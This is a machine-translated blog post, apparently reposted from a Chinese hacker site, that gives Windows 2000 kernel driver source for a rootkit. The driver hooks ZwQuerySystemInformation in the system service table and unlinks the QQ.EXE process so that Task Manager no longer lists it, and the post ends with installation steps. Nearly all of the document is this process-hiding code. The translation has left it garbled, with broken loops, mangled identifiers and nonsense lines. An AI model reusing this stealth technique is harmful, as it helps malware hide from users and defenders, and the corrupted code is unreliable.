Hook ZwQuerySystemInformation Hide QQ program

xiaoxiao2021-04-03  243

Nearly studying rootkit, first stated that I am a rootkit's rookie, and I feel that there is still a deep study. This time I will write a hook system written during me.

The zwquerysysteminformation function is to implement the code of hidden QQ process, and it is also a black tile to add bricks. The hidden process can be detected by the rootkit detection tool, but the general method can not see, such as the task manager, and the process listed in the program can not be seen. I have added relevant comments in the program, and I will say it here. There are many articles about this technique, and I am just summing up myself. code show as below

Code:

// File name: hider.c

// Author: Jin Mao Shu (Chengdu hackers online) HTTP://Www.CduHacker.Com

// Features: Process for implementing programs to be protected with drivers

// Modify: 2005.12.23 Start writing

// Compilation: Bulid

// Environment: Win2000SP4 VC6.0 Win2000 DDK

#include "ntddk.h"

#include "stdio.h"

#include "stdlib.h"

#include "hider.h"

#define NT_Procnamelen 16

#define procnamelen 20

#pragma pack (1)

Typedef struct service {

Unsigned Int * ServiceTableBase;

Unsigned int * service; // buy only in checked build

Unsigned int numberofservices;

Unsigned char * paramtablebase;

} ServicesDescriptAblentry_t, * pserviceDescriptableentRY_T;

#pragma pack ()

__Declspec (DLLIMPORT) ServiceDescriptAblentry_t keserviceDescriptable;

/ / Define a macro systemservice (_function)

#define systemservice (_function) keserviceDescriptable.ServentAblebase [* (pulong) ((pulong) _function 1)]]

Struct _system_threads

{

Large_integer kernetime;

Large_integer usertime;

Large_integer createtime;

Ulong Waittime;

Pvoid ​​Startaddress;

Client_id clientis;

KPRIORITY PRIORITY

KPRIORITY BASEPRIORITY

Ulong contextswitchcount;

Ulong threadState;

Kwait_reason waitreason;

}

Struct _system_processes

{

Ulong nextentryDelta;

Ulong threadcount;

Ulong reserved [6];

Large_integer createtime; large_integer usertime;

Large_integer kernetime;

Unicode_string processname;

KPRIORITY BASEPRIORITY

Ulong processid;

Ulong inheritedFromProcessId;

Ulong handlecount;

Ulong reserved2 [2];

VM_Counters vmcounters;

IO_COUNTERS IOCOUNTERS; // Windows 2000 ONLY

Struct _system_threads throughs [1];

}

// Drive Inlet Functions Driverentery

NTSTATUS DRIVERENTRY

In PDRIVER_OBJECT DriverObject,

In Punicode_String RegistryPath

)

{INT I;

DBGPRINT ("Drive Load is successful.");

GetProcessNameOffset ();

// Register the drive distribution function

For (i = 1; i

{

DBGPRINT ("Majorfunction ..");

DriverObject-> majorfunction [i] = ondispatch;

}

// Register Drive Uninstall Function

DriverObject-> driverunload = onunload;

Oldzwquerysysteminformation = (zwQuerySystemInformation);

_asm CLI

"SystemSystem (ZWQuerySystemInformation) = newzwQuerySystemInformation;

_asm STI

Return status_success;

}

// User-defined newzwQuerySystemInformation

NTSTATUS NewzwQuerySystemInformation

In Ulong SystemInformationClass,

In Pvoid ​​SystemInformation,

In Ulong SystemInformationLength,

OUT Pulong ReturnLength

)

{

NTSTATUS RC;

CHAR APROCESSNAME [procnamelen];

GetProcessName (AprocessName);

RC = ((zwQuerySystemInformation) (OldzwQuerySystemInformation))

SystemInformationClass,

SystemInformation,

SystemInformationLength,

ReturnLength;

IF (NT_Success (RC))

{

// Double Check The Process Name, IF IT Starts W / '_Root_' Do Not

// Apply Any Stealth

IF (0 == Memcmp (AproCessName, "_root_", 6))

{

DBGPRINT ("Rootkit: detected system query from _root_ process / n");

}

ELSE IF (5 == SystemInformationClass)

{

// this is a process list, Look for Process Names That Start with

// '_root_'

Struct _system_processes * curr = (struct _system_processes *) SystemInformation;

Struct _system_processes * prev = null;

DBGPrint ("Rootkit: NewzwQuerySystemInformation () from% S / N", APROCESSNAME

While (Curr)

{

// struct _system_processes * next = ((char *) Curr = curr-> nextentryDelta);

INT BMOD = FALSE;

ANSI_STRING process_name;

RTLUNICODESTRINGTOANSISTRING (& Process_name, & (Curr-> ProcessName), TRUE);

IF ((0 process_name.length))

{

IF (0 == MEMCMP (Process_name.buffer, "QQ.EXE", 6)) // Modify the program you want to hide

{

//

// We Have a Winner!

//

Char _output [255];

CHAR _PNAME [255];

MEMSET (_PNAME, 0, 255);

Memcpy (_pname, process_name.buffer, process_name.length);

Sprintf (_output,

"Rootkit: Hiding Process, PID:% D / TNAME:% S / R / N",

Curr-> Processid,

_PNAME);

DBGPRINT (_OUTPUT);

IF (prev)

{

IF (Curr-> NEXTENTRYDELTA)

{

// make Prev Skip this entry

Prev-> NEXTENTRYDELTA = CURR-> NEXTENTRYDELTA;

BMOD = true; // flag to say what we have modified

}

Else

{

// We are last, so make prev the end

Prev-> NEXTENTRYDELTA = 0;

}

}

Else

{

IF (Curr-> NEXTENTRYDELTA)

{

// We are first in the list, SO Move It Forward

(char *) Systeminformation = curr-> nextentryDelta;

}

Else

{

// We are the only process!

Systeminformation = NULL;

}

}

}

}

RTLFreeansString (& Process_name);

Prev = CURR;

IF (! bmod)

Prev = CURR;

IF (Curr-> NEXTENTRYDELTA) (CHAR *) Curr = Curr-> NEXTENTRYDELTA); Else Curr = NULL;

}

}

}

Return (RC);

}

// Get the program name

INT getProcessName (Pchar thename)

{

Peprocess curproc;

Char * nameptr;

Ulong i;

KIRQL Oldirql;

IF (g_processnameoffset)

{

Curproc = psgetcurrentprocess ();

Nameptr = (pchar) Curproc g_processnameoffset;

STRNCPY (THENAME, NAMEPTR, NT_PROCNAMELEN);

Thename [nt_procnamelen] = 0; / * NULLAT END * /

Return True;

}

Return False;

}

// Drive Uninstall Function Onunload

Void Onunload (in PDRIVER_Object DriverObject)

{

PDEvice_Object P_nextobj;

PDEvice_Object OldDeviceObject;

P_nextobj = driverObject-> DeviceObject;

DBGPRINT ("Onunload ..");

While (p_nextobj! = NULL)

{

OldDeviceObject = p_nextobj;

p_nextobj = p_nextobj-> nextdevice;

IodeleteDevice (OldDeviceObject);

}

_asm CLI

(ZWQuerySystemInformation) = OldzwQuerySystemInformation; / OLDZWQUERYSYSTEMINFORMATION;

_asm STI

Return status_success;

}

// Drive the distribution function, hide the process you want to protect

NTSTATUS OnDISPATCH (

In PDEvice_Object DeviceObject,

In PIRP IRQ

)

{

IRQ-> iostatus.status = status_success;

IOCOMPLETEREQUEST (IRQ, IO_NO_INCREMENT);

Return Irq-> iostatus.status;

}

// Get function offset address functions getProcessNameOffset

Void getProcessNameOffset ()

{

INT I;

Peprocess curproc;

DBGPRINT ("getProcessNameOffset ..");

Curproc = psgetcurrentprocess ();

For (i = 0; i <3 * Page_size; i )

{

IF (! "," system ", (pchar) Curproc i, Strlen (" System "))))))))

{

g_processnameoffset = i;

}

}

}

Hider.h

Code:

// File name: hider.h

// Author: Jin Mao Shu (Chengdu hackers online) HTTP://Www.CduHacker.Com

// Function: Definition Function, and Global Variable

// Modify: 2005.12.23 Start writing

// Compilation: Bulid

// Environment: Win2000SP4 VC6.0 Win2000 DDK

Typedef NTSTATUS (* ZwQuerySystemInformation)

Ulong SystemInformationClass,

PVOID SystemInformation,

Ulong SystemInformationLength,

Pulong ReturnLength

);

// Global variable part

Ulong g_processnameoffset;

ZwQuerySystemInformation OldzwQuerySystemInformation;

// Function Defining section

Void getProcessNameOffset ();

Void onunload (in pdriver_object);

NTSTATUS OnDISPATCH (in PDevice_Object, In Pirp);

INT getProcessName (Pchar);

NTSTATUS NewzwQuerySystemInformation (in Ulong SystemInformation Class, In Pvoid ​​SystemInformation, in Ulong SystemInformationLength);

NTSYSAPI NTSTATUS NTAPI ZWQUERYSYSTEMINFORMATION

In Ulong SystemInformationClass,

In Pvoid ​​SystemInformation,

In Ulong SystemInformationLength,

OUT Pulong ReturnLength;

Here is the programming of the compiled program.

The address of the attachment is on the website

testing method.

1. Import the registry first, then copy the hider.sys to the system32 directory.

2, restart the machine.

3, command prompt below "Net Start Hider"

4, open the QQ program

5, open the task manager.

At this time, you can't see QQ process in the task manager.

转载请注明原文地址:https://www.9cbs.com/read-131647.html

New Post(0)